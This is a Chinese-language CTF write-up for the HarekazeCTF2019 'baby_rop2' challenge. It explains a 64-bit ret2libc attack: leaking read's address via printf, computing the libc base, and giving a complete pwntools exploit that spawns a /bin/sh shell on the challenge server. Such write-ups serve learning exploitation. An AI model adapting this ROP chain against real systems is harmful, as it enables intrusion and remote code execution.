[HarekazeCTF2019]baby_rop2

64位的ret2libc3

0x01

利用printf泄露libc版本和基地址，传参的时候需要传入格式化字符串%s给寄存器rdi（程序中第二个printf函数自带，返回至该格式化字符串地址即可）；并将想要泄露的read_got传给寄存器。

0x02

exp

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')
p = remote('node4.buuoj.cn',25502)
#p = process('./babyrop2')

elf = ELF('./babyrop2')
libc = ELF('libc.so.6')

#一定要用题目给的libc文件，可能必须要用题目给的才能打通

printf_plt = elf.plt['printf']
read_got = elf.got['read']
main_plt = elf.sym['main']

pop_rdi = 0x0000000000400733
pop_rsi_r15 = 0x0000000000400731
fmt = 0x0000000000400790

payload1 = b'a'*(0x20+8)+p64(pop_rdi)+p64(fmt)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)
p.recvuntil("name? ")
p.sendline(payload1)

read_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print("read_addr ======>> "+hex(read_addr))
libc_base = read_addr -  libc.sym["read"]
system_addr = libc_base+libc.sym["system"]
bin_sh_addr=libc_base+libc.search(b'/bin/sh').__next__()

payload2 = b'a'*0x28+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(0)
p.sendline(payload2)

p.interactive()

本栏目推荐文章
• P5321 [BJOI2019] 送别 题解--zhengjun
• [GXYCTF2019]BabySQli
• [Keyence2019] Paper Cutting
• Windows Server 2016 & 2019 工作站速配脚本
• 洛谷 P5359 [SDOI2019] 染色
• 板刷 2019~？的省选题
• 【pwn】cmcc_simplerop --rop链的构造
• [GXYCTF2019]BabyUpload
• [极客大挑战 2019]Secret File 1
• [SUCTF 2019]EasySQL 1

HarekazeCTF baby_rop 2019 baby ropharekazectf baby_rop 2019 baby baby_rop pwnthybytes baby_sql 2019 baby harekazectf rop baby ez_baby_apk rop_chain baby_sql baby_web